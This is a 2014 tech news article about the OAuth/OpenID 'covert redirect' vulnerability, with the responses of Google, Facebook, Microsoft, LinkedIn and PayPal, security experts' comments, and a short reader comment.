AAPL Stock: 111.6 ( 0 )

Printed from

OAuth, OpenID 'covert redirect' flaw discovered; hard to implement fix

updated 11:55 am EDT, Fri May 2, 2014

Google, Microsoft, Facebook all potentially affected by attack vector

Under scrutiny from security researchers after the discovery of Heartbleed, another significant problem has been identified in open source security measures. Authentication tools OAuth and OpenID have been found to be victim to a "covert redirect" flaw, with sites such as Google, PayPal, Yahoo, Facebook, and Microsoft's Hotmail subject to attack.

The flaw manifests itself as a login popup based on the affected site's domain address. A user clicking on a phishing link will get a window purporting to be from the faked credential holder, such as Facebook, with the covert redirect flaw using the actual site address for authentication, making identification of a redirect that much harder. Any login credentials are then redirected, and released to the malicious coder, rather than sent to the legitimate site for authentication.

Ph.D student Wang Jing of the Nanyang Technological University in Singapore discovered the vector. Wang has reported his findings to Facebook, LinkedIn, and Microsoft, and has received little enthusiasm from any of the companies he's spoken with: LinkedIn plans to publish a blog post on the matter "shortly," but promised no action. Google informed him that the problem was being tracked. Microsoft claimed that they weren't subject to the flaw. Facebook said that they were aware of the problem, "understood the risks associated with OAuth 2.0" and a fix was "something that can't be accomplished in the short term."

Paypal Chief Technology Officer James Barrese told Electronista in a statement that when PayPal implemented OAuth2.0/OpenID, "we engineered additional security measures to protect our merchants and customers. These measures protect PayPal customers from this specific OAuth2.0/OpenID vulnerability."

Code verification company Veracode Chief Technology Officer Chris Wysopal told CNet that "given the trust users put in Facebook and other major OAuth providers, I think it will be easy for attackers to trick people into giving some access to their personal information stored on those service."

WhiteHat Security founder Jeremiah Grossman examined Wang's findings. He noted that "I could have sworn I've seen a report of a very similar if not identical vulnerability in OAuth. It would appear this issue is essentially a known 'wontfix.' This is to say, it's not easy to fix, and any effective remedies would negatively impact the user experience." He added that in his view, the problem was "just another example that Web security is fundamentally broken, and the powers that be have little incentive to address the inherent flaws."

by MacNN Staff



  1. Steve Wilkinson

    Forum Regular

    Joined: 12-19-01

    Yep, not only is this whole 'single sign on' thing a bad idea for social engineering reasons (i.e.: phishing training), with an added security flaw, it becomes even more dangerous.

Login Here

Not a member of the MacNN forums? Register now for free.


Network Headlines

Follow us on Facebook


Most Popular


Recent Reviews

Polk Hinge Wireless headphones

Polk, a company well-established in the audio market, recently released a new set of headphones aimed at the lifestyle market. The Hin ...

Blue Yeti Studio

Despite being very familiar with Blue Microphones' lower-end products -- we've long recommended the company's Snowball line of mics ...

ZTE Spro 2 Smart Projector

Home theaters are becoming more and more accessible these days, but maybe you've been a bit wary about buying a home projector. And h ...


Most Commented